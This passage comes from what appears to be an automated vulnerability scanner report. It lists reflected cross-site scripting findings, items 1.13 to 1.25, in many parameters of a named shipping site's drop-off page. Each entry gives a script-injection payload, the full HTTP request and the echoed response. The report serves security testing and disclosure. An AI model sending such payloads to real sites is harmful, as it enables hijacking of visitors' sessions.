omepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=8eddc"><script>alert(1)</script>8e684956a59&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.13. http://www.ups.com/dropoff [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33854"><script>alert(1)</script>8b42eacb84d was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;33854"><script>alert(1)</script>8b42eacb84d&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:11 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
et=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;33854"><script>alert(1)</script>8b42eacb84d" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.14. http://www.ups.com/dropoff [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9dd"><script>alert(1)</script>e86155390ee was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=fd9dd"><script>alert(1)</script>e86155390ee&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:12 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28192


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=fd9dd"><script>alert(1)</script>e86155390ee" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.15. http://www.ups.com/dropoff [localeCountry parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the localeCountry request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef639"><script>alert(1)</script>3d43a8340e4 was submitted in the localeCountry parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=ef639"><script>alert(1)</script>3d43a8340e4&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:16 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=ef639"><script>alert(1)</script>3d43a8340e4&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.t
...[SNIP]...

1.16. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd10b"><script>alert(1)</script>e624eadde3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState=&cd10b"><script>alert(1)</script>e624eadde3f=1 HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:10:22 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
ME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&cd10b"><script>alert(1)</script>e624eadde3f=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe
...[SNIP]...

1.17. http://www.ups.com/dropoff [originCity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originCity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a72"><script>alert(1)</script>909e36f53bc was submitted in the originCity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=83a72"><script>alert(1)</script>909e36f53bc&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:47 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
RAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=83a72"><script>alert(1)</script>909e36f53bc&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe"
...[SNIP]...

1.18. http://www.ups.com/dropoff [originCityHist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originCityHist request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae40c"><script>alert(1)</script>eb951f8ecb3 was submitted in the originCityHist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=ae40c"><script>alert(1)</script>eb951f8ecb3&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:54 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
ttp://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=ae40c"><script>alert(1)</script>eb951f8ecb3&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe" name="doliframe" width="985" fram
...[SNIP]...

1.19. http://www.ups.com/dropoff [originCountry parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originCountry request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89548"><script>alert(1)</script>d374b7bc142 was submitted in the originCountry parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=89548"><script>alert(1)</script>d374b7bc142&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:10:04 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=89548"><script>alert(1)</script>d374b7bc142&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=131384
...[SNIP]...

1.20. http://www.ups.com/dropoff [originPostal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originPostal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d3a1"><script>alert(1)</script>7d331c08ec3 was submitted in the originPostal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1d3a1"><script>alert(1)</script>7d331c08ec3&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:52 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1d3a1"><script>alert(1)</script>7d331c08ec3&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a"
...[SNIP]...

1.21. http://www.ups.com/dropoff [originPostalHist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originPostalHist request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8160b"><script>alert(1)</script>92a9a0c9a59 was submitted in the originPostalHist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=8160b"><script>alert(1)</script>92a9a0c9a59&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:10:00 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=8160b"><script>alert(1)</script>92a9a0c9a59&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe" name="doliframe" w
...[SNIP]...

1.22. http://www.ups.com/dropoff [originState parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b9b"><script>alert(1)</script>b99e0d0e0fc was submitted in the originState parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState=38b9b"><script>alert(1)</script>b99e0d0e0fc HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:10:11 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
s.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=38b9b"><script>alert(1)</script>b99e0d0e0fc&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.23. http://www.ups.com/dropoff [originStateHist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originStateHist request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1467e"><script>alert(1)</script>7451bb3fc1d was submitted in the originStateHist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=1467e"><script>alert(1)</script>7451bb3fc1d&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:57 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=1467e"><script>alert(1)</script>7451bb3fc1d&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.24. http://www.ups.com/dropoff [originStreet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the originStreet request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ad7"><script>alert(1)</script>cb445347d7f was submitted in the originStreet parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=f3ad7"><script>alert(1)</script>cb445347d7f&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=f3ad7"><script>alert(1)</script>cb445347d7f&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id
...[SNIP]...

1.25. http://www.ups.com/dropoff [userState parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the userState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7662f"><script>alert(1)</script>d2c98762bff was submitted in the userState parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

